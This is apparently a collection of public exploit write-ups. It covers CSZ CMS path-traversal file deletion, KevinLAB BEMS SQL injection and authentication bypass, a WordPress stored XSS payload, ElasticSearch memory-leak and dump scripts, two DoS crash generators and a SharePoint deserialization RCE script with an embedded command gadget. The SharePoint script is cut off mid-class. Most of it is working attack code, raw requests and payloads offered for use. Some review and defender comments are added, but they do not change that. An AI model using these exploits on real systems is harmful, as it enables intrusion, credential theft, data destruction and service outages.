Sec-Fetch-Dest: document
Referer: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/artedit/4
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=l9f1kpqohequemh1q3tt11j36hs99c25
Connection: close

------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="title"

article beta
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="keyword"

testing file
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="short_desc"

deletion
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="cat_id"

2
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="content"

<div class="row">
<div class="col-md-12">
<p>test for file deletion</p>
</div>
</div>
<p><br><br></p>
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="del_file"

../../../conf_secret_file.php
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="file_upload"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="mainPicture"

2021/1626802955_1.png
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="del_file2"

../../../config_backup.txt
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="file_upload2"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="mainFile"

2021/1626802956_1.png
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="lang_iso"

en
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="active"

1
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="fb_comment_active"

1
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="fb_comment_limit"

5
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="fb_comment_sort"

reverse_time
------WebKitFormBoundaryAMyATk1BfQaBOHvY
Content-Disposition: form-data; name="submit"

Save
------WebKitFormBoundaryAMyATk1BfQaBOHvY--

---



##########
# PoC 2  #
##########

Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/settings/update
Vulnerable Code: line 944, 958 - cszcms\models\Csz_admin_model.php

Steps to Reproduce:

1. Login as admin
2. Goto General Menu > Site Setting
3. Upload any image as "Site Logo" and "Image of og metatag" and click save button
4. Click "Delete File" button for both "Site Logo" and "Image of og metatag" and click save button
5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_og_image"


2) Assumed there are files conf_secret_file.php and config_backup.txt in web root

PoC #2) param del_file & del_og_image - Deleting conf_secret_file.php and config_backup.txt in web root

Request: 
========

POST /CSZCMS-V1.2.9/admin/settings/update HTTP/1.1
Host: localhost
Content-Length: 5163
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8cAl5KcKGP0D3Qi2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/CSZCMS-V1.2.9/admin/settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=t5jloe106o2i5hst51chr5ita9aklieu
Connection: close

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteTitle"

CSZ CMS Starter
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="title_setting"

2
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteFooter"

&copy; %Y% CSZ CMS Starter
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteKeyword"

CMS, Contact Management System, HTML, CSS, JS, JavaScript, framework, bootstrap, web development, thai, english
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteTheme"

cszdefault
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteLang"

english
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="additional_metatag"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="additional_js"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="pagecache_time"

0
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="assets_static_domain"

demo@cszcms.com
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="html_optimize_disable"

1
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="del_file"

../../conf_secret_file.php
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="file_upload"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteLogo"

2021/1626800829_logo.png
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="del_og_image"

../../config_backup.txt
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="og_image"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="ogImage"

2021/1626800829_og.png
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="siteEmail"

demo@cszcms.com
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="email_protocal"

mail
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_host"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_user"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_pass"

123456
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="smtp_port"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="sendmail_path"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="email_logs"

1
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="googlecapt_sitekey"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="googlecapt_secretkey"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="ga_client_id"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="ga_view_id"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gsearch_cxid"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gmaps_key"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gmaps_lat"

-28.621975
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="gmaps_lng"

150.689082
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="fbapp_id"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="facebook_page_id"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="adobe_cc_apikey"

------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_bg"

#645862
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_fg"

#ffffff
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_link"

#f1d600
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_msg"

This website uses cookies to improve your user experience. By continuing to browse our site you accepted and agreed on our 
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_linkmsg"

Privacy Policy and terms.
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_moreinfo"

https://www.cszcms.com/LICENSE.md
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_txtalign"

left
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="cookieinfo_close"

Got it!
------WebKitFormBoundary8cAl5KcKGP0D3Qi2
Content-Disposition: form-data; name="submit"

Save
------WebKitFormBoundary8cAl5KcKGP0D3Qi2--

---


# For more explanation, you can refer to the github issue on cszcms via https://github.com/cskaza/cszcms/issues/32
# The affected version is 1.2.9.
            
# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass
# Date: 05.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kevinlab.com

Vendor: KevinLAB Inc.
Product web page: http://www.kevinlab.com
Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System)

Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy
management platform. KevinLAB's BEMS (Building Energy Management System) enables
efficient energy management in buildings. It improves the efficiency of energy use
by collecting and analyzing various information of energy usage and facilities in
the building. It also manages energy usage, facility efficiency and indoor environment
control.

Desc: The application suffers from an unauthenticated SQL Injection vulnerability.
Input passed through 'input_id' POST parameter in '/http/index.php' is not properly
sanitised before being returned to the user or used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication
mechanism.

Tested on: Linux CentOS 7
           Apache 2.4.6
           Python 2.7.5
           PHP 5.4.16
           MariaDB 5.5.68


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5655
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php


05.07.2021

--


PoC POST data payload (extract):
--------------------------------

POST /http/index.php HTTP/1.1
Host: 192.168.1.3

requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]


PoC POST data payload (authbypass):
-----------------------------------

POST /http/index.php HTTP/1.1
Host: 192.168.1.3

requester=login
request=login
params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
            
# Exploit Title: WordPress Plugin Simple Post 1.1 - 'Text field' Stored Cross-Site Scripting (XSS)
# Date: 23/07/2021
# Exploit Author: Vikas Srivastava
# Software Link: https://wordpress.org/plugins/simple-post/
# Version: 1.1
# Category: Web Application
# Tested on Mac

How to Reproduce this Vulnerability:

1. Install WordPress 5.7.2
2. Install and activate Simple Post
3. Navigate to Settings >> Simple Post and enter the XSS payload into the Text input field.
4. Click Update Options.
5. You will observe that the payload is stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears.
6. Payload Used: "><script>alert(document.cookie)</script>
            
# Exploit Title: ElasticSearch 7.13.3 - Memory disclosure 
# Date: 21/07/2021
# Exploit Author: r0ny
# Vendor Homepage: https://www.elastic.co/
# Software Link: https://github.com/elastic/elasticsearch
# Version: 7.10.0 to 7.13.3
# Tested on: Kali Linux
# CVE : CVE-2021-22145

#!/usr/bin/python3

from argparse import ArgumentParser
import requests
from packaging import version
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Every request below is sent with verify=False (no TLS certificate checking),
# so the per-request urllib3 warning is silenced up front.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

print("\n################################################################################################")
print("######    CVE-2021-22145 Memory leak vulnerability on Elasticsearch (7.10.0 to 7.13.3)    ######")
print("######                     Exploit by r0ny (https://twitter.com/_r0ny)                    ######")
print("################################################################################################\n")
parser = ArgumentParser()
parser.add_argument("-u", "--url", dest="url", help="URL of ElasticSearch service")
parser.add_argument("-apikey", "--api-key", dest="api_key", help="API Key Authentication (Base64)", metavar="API", default="")
parser.add_argument("-b", "--basic", dest="basic", help="Basic Authentication (Base64)", default="")
args = parser.parse_args()

# NOTE(review): the usage example in the error text names "-host", but the
# option defined above is "-u/--url".
if not (args.url):
    parser.error('Please input the elasticsearch url. e.g "python3 CVE-2021-22145.py -host http://127.0.0.1:9200"')

#Prepare authentication header (the ApiKey form wins when both values are given)
authorization_header = "" 
if(args.api_key or args.basic):
    authorization_header = "ApiKey " + args.api_key if args.api_key else "Basic " + args.basic

#Check elasticsearch version: a GET on the base URL returns version.number in its JSON body
r = requests.get(args.url,headers={"Authorization":authorization_header}, verify=False)
try:
	es_version = json.loads(r.content)["version"]["number"]
except:
	# NOTE(review): a bare except also catches KeyboardInterrupt/SystemExit;
	# (ValueError, KeyError, TypeError) is what a missing or non-JSON body
	# actually raises here.
	print("# Couldn't connect to " + args.url + ", please verify the url or the authentication token\n")
	print("# Server response: " + str(r.content))
	exit()

# Only 7.10.0 <= version <= 7.13.3 is treated as affected; any other version stops here.
if version.parse(es_version) < version.parse("7.10.0") or version.parse(es_version) > version.parse("7.13.3"):
	print("# Elastic Service not vulnerable")
	print("# Elastic Service version: " + es_version) 
	print("# Elastic Service vulnerable versions: 7.10.0 to 7.13.3") 	
	exit()

#Prepare exploitation: a body that is not valid JSON, posted to the bulk endpoint
payload = "@\n"
vulnerable_endpoint = "/_bulk"
url = args.url + vulnerable_endpoint

#Exploitation
print("# ElasticSearch Version: " + es_version)
print("# Request to " + url+"\n")
r = requests.post(url, data = payload, headers={"content-type":"application/json", "Authorization":authorization_header}, verify=False)

#Read Memory Leak and remove stacktrace
# The error "reason" strings in the response quote the request buffer; the text
# between (byte[])" and "; line" is what gets printed. Defender note: on a server
# inside the affected range these malformed-bulk requests presumably show up as
# parse errors on /_bulk; moving off the 7.10.0-7.13.3 range removes the leak.

print("$$$$$$$$$$$$$$$$$$$$$$$$$")
print("$$$$$ Memory Leaked $$$$$")
print("$$$$$$$$$$$$$$$$$$$$$$$$$\n")
response = json.loads(r.content)
# NOTE(review): neither line is guarded -- a response without the expected
# error structure (e.g. a patched server) raises KeyError/IndexError here.
leak1 = response["error"]["root_cause"][0]["reason"].split("(byte[])\"")[1].split("; line")[0]
leak2 = response["error"]["reason"].split("(byte[])\"")[1].split("; line")[0]
print(leak1+"\n"+leak2)
            
# Exploit Title: NoteBurner 2.35 - Denial Of Service (DoS) (PoC)
# Date: 25.07.2021
# Vendor Homepage:https://www.noteburner.com/
# Software Link:  https://anonfiles.com/13h9Hb82ub/noteburner_exe
# Exploit Author: Achilles
# Tested Version: 2.35
# Tested on: Windows 7 x64


# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Noteburner
# 4.- Click More and Enter License Code
# 5.- Paste the content of EVIL.txt into the Field: 'Name' and 'Code'
# 6.- Click 'OK' and you will see a crash.

#!/usr/bin/env python
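# 6000 'A' characters written to Evil.txt for pasting into the licence fields.
buffer = "\x41" * 6000

# The original listing had lost its indentation and used Python 2 print
# statements; print(...) with a single argument behaves the same on both
# Python 2 and 3, and the context manager closes the file on every path.
try:
    with open("Evil.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except (IOError, OSError):
    # Only file-system failures are reported; other errors propagate.
    print("File cannot be created")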
            
# Exploit Title: Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)
# Date: 25.07.2021
# Vendor Homepage:https://www.leawo.org
# Software Link:  https://www.leawo.org/downloads/total-media-converter-ultimate.html
# Exploit Author: Achilles
# Tested Version: 11.0.0.1
# Tested on: Windows 7 x64


# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Leawo Prof. Media
# 4.- Click Activation Center
# 5.- Paste the content of EVIL.txt into the Field: 'Keycode'
# 6.- Click 'Register' and you will see a crash.

#!/usr/bin/env python
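# 6000 'A' characters written to Evil.txt for pasting into the 'Keycode' field.
# The "=3D" in the original line was a quoted-printable artefact for "=".
buffer = "\x41" * 6000

# The original listing had lost its indentation and used Python 2 print
# statements; print(...) with a single argument behaves the same on both
# Python 2 and 3, and the context manager closes the file on every path.
try:
    with open("Evil.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except (IOError, OSError):
    # Only file-system failures are reported; other errors propagate.
    print("File cannot be created")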
            
# Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump
# Date: 2021-07-21
# Exploit Author: Joan Martinez @magichk
# Vendor Homepage: https://www.elastic.co/
# Software Link: https://www.elastic.co/
# Version: >= 7.10.0 to <= 7.13.3
# Tested on: Elastic ECE (Cloud)
# CVE : CVE-2021-22146
# Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180 

import os
import argparse
import sys

######### Check Arguments
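def checkArgs():
	"""Parse the command line and return the argparse namespace.

	Prints usage to stderr and exits with status 1 when no arguments were
	given or when ``--host`` / ``--port`` is missing.  ``--index`` stays
	optional; the ``__main__`` guard passes 0 to ``exploit`` when it is absent.
	"""
	parser = argparse.ArgumentParser(description='Elasticdump 1.0\n')
	parser.add_argument('-s', "--host", action="store", dest='host',
	                    help="Host to attack.")
	parser.add_argument('-p', "--port", action="store", dest='port',
	                    help="Elastic search port by default 9200 or 9201")
	parser.add_argument('-i', "--index", action="store", dest='index',
	                    help="Index to dump (Example: 30)")

	args = parser.parse_args()
	# argparse stores None for omitted options, so the original
	# ``args.host == False`` tests could never fire (and the ``arg.dump``
	# reference was a NameError waiting to happen); test for missing values.
	if len(sys.argv) == 1 or not args.host or not args.port:
		parser.print_help(sys.stderr)
		sys.exit(1)
	return args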

def banner():
    """Print the six-line ASCII-art "elasticdump" banner to stdout."""
    # Raw strings keep the backslashes in the art exactly as written.
    art = (
        r"      _           _   _         _",
        r"  ___| | __ _ ___| |_(_) ___ __| |_   _ _ __ ___  _ __",
        r" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ",
        r"|  __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |",
        r" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/",
        r"                                                 |_|",
    )
    print("\n".join(art))



def exploit(host,port,index):
	"""Issue one ``_bulk`` index request per id, from 0 up to ``index`` inclusive.

	``index`` is the string taken from ``--index``; the caller's "no index"
	value 0 becomes an upper bound of 1,000,000,000, i.e. an effectively
	unbounded loop.  Each iteration shells out to ``curl`` (``-k`` skips TLS
	verification, ``-s`` silences progress output) and posts an ndjson
	``index`` action whose ``_id`` is the loop counter.  The response is not
	captured or checked; whatever curl prints is the "dump".
	"""

	if (index != 0):
	    final = int(index)
	else:
	    final = 1000000000

	cont = 0
	while (cont <= final):
		# NOTE(review): host and port are spliced into a shell command string
		# (os.system); a subprocess call with an argument list would avoid the
		# shell.  There is no delay or status check either, so an unreachable or
		# patched target is hit up to ``final`` times.
		os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\"  :  {\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s")
		cont = cont + 1

if __name__ == "__main__":

	banner()
	args = checkArgs()
	# Without --index, exploit() gets 0 and picks its own (huge) upper bound.
	exploit(args.host, args.port, args.index or 0)
            
# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution (2)
# Google Dork: inurl:quicklinks.aspx
# Date: 2020-08-14
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service
# Pack 2, SharePoint Server 2019
# Tested on: Windows 2016
# CVE : CVE-2020-1147
# Credit goes to Steven Seele and Soroush Dalili
# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html

#!/usr/bin/python
from sys import argv, exit, stdout, stderr
import argparse
import requests
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests_ntlm import HttpNtlmAuth
from urllib import quote, unquote
import logging


class Exploit(object):
    """CVE-2020-1147 request builder for SharePoint's quicklinks pages.

    Holds a ``requests`` session (NTLM auth, TLS verification off, optional
    HTTP proxy) and posts a ``DataSet`` XML document in the
    ``__SUGGESTIONSCACHE__`` form field of ``/_layouts/15/quicklinks.aspx``
    (or ``quicklinksdialogform.aspx``) with ``Mode=Suggestion``.  The XML's
    ``msdata:DataType`` names an ``ExpandedWrapper`` of ``LosFormatter`` and
    ``ObjectDataProvider``, and its ``MethodParameters`` carry ``gadget``.

    Defender notes: the on-the-wire markers are a POST to those two pages
    whose ``__SUGGESTIONSCACHE__`` value contains ``<DataSet>`` with
    ``ExpandedWrapper``/``LosFormatter`` in a ``msdata:DataType``; the fix is
    the vendor patch for CVE-2020-1147.  Written for Python 2
    (``dict.iteritems`` in ``parse_page``).
    """
    # To generate the gadget use:
    # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command"
    # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command"
    # NOTE(review): the blob below is the author's pre-built payload and is
    # used verbatim by send_payload(); the command it runs is baked into it.
    gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw=='
    control_path_quicklinks = '/_layouts/15/quicklinks.aspx'
    control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx'
    # Page currently targeted; __main__ swaps in the dialog-form path for "-both".
    control_path = control_path_quicklinks

    def __init__(self, redirect=False, proxy_address='', username='', domain='', password='', target=''):
        """Prepare session state and render the DataSet payload.

        ``username`` is stored as ``domain\\username`` (so an empty domain
        yields a leading backslash).  ``timeout`` is recorded but never passed
        to requests, so the HTTP calls have no timeout.
        """
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        self.username = '%s\\%s' % (domain, username)
        self.target = target
        self.password = password
        self.session = requests.session()
        self.redirect = redirect
        self.timeout = 0.5
        # Both schemes go through the one HTTP proxy when an address was given.
        self.proxies = {
            'http': 'http://%s' % proxy_address,
            'https': 'http://%s' % proxy_address
        } \
            if proxy_address is not None \
               and proxy_address != '' else {}
        self.headers = {}
        self.query_params = {
            'Mode': "Suggestion"
        }
        # Form fields posted by send_payload(); parse_page() can refresh them
        # from hidden <input> tags.
        self.form_values = {
            '__viewstate': '',
            '__SUGGESTIONSCACHE__': ''
        }
        self.cookies = {}
        # DataSet with a schema whose column type is the ExpandedWrapper
        # LosFormatter/ObjectDataProvider pair; {GADGET} is substituted below.
        self.payload = """\
<DataSet>
  <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset">
    <xs:element name="somedataset" msdata:IsDataSet="true"
msdata:UseCurrentLocale="true">
      <xs:complexType>
        <xs:choice minOccurs="0" maxOccurs="unbounded">
          <xs:element name="Exp_x0020_Table">
            <xs:complexType>
              <xs:sequence>
                <xs:element name="pwn"
msdata:DataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter,
System.Web, Version=4.0.0.0, Culture=neutral,
PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider,
PresentationFramework, Version=4.0.0.0, Culture=neutral,
PublicKeyToken=31bf3856ad364e35]], System.Data.Services,
Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
type="xs:anyType" minOccurs="0"/>
              </xs:sequence>
            </xs:complexType>
          </xs:element>
        </xs:choice>
      </xs:complexType>
    </xs:element>
  </xs:schema>
  <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata"
xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
    <somedataset>
      <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0"
diffgr:hasChanges="inserted">
        <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <ExpandedElement/>
        <ProjectedProperty0>
            <MethodName>Deserialize</MethodName>
            <MethodParameters>
                <anyType
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xsi:type="xsd:string">{GADGET}</anyType>
            </MethodParameters>
            <ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
        </ProjectedProperty0>
        </pwn>
      </Exp_x0020_Table>
    </somedataset>
  </diffgr:diffgram>
</DataSet>""".replace('{GADGET}', self.gadget)

    def do_get(self, url, params=None, data=None):
        """GET ``url`` through the shared session.

        Uses the instance's NTLM credentials, headers, cookies and proxies;
        redirects follow ``self.redirect``; TLS verification is disabled and
        no timeout is applied.  Returns the ``requests`` response.
        """
        return self.session.get(
            url=url,
            verify=False,
            allow_redirects=self.redirect,
            headers=self.headers,
            cookies=self.cookies,
            proxies=self.proxies,
            data=data,
            params=params,
            auth=HttpNtlmAuth(self.username, self.password)
        )

    def do_post(self, url, data=None, params=None):
        """POST ``data`` to ``url`` with the same session settings as ``do_get``.

        Returns the ``requests`` response.
        """
        return self.session.post(
            url=url,
            data=data,
            verify=False,
            allow_redirects=self.redirect,
            headers=self.headers,
            cookies=self.cookies,
            proxies=self.proxies,
            params=params,
            auth=HttpNtlmAuth(self.username, self.password)
        )

    def parse_page(self, content):
        """Refresh ``form_values`` from hidden inputs in an HTML page.

        For each key already in ``form_values``, copies the ``value`` of the
        last matching ``<input name=...>`` tag.  Parse problems are reported
        on stderr and otherwise ignored.  Returns ``self``.  ``iteritems`` is
        Python 2 only.
        """
        soup = BeautifulSoup(content, 'lxml')
        for key, val in self.form_values.iteritems():
            try:
                for tag in soup.select('input[name=%s]' % key):
                    try:
                        self.form_values[key] = tag['value']
                    except Exception as error:
                        stderr.write('error for key %s error %s\n' % (key, str(error)))
            except Exception as error:
                stderr.write('error for selector %s error %s\n' % (key, str(error)))
        return self

    def debug(self):
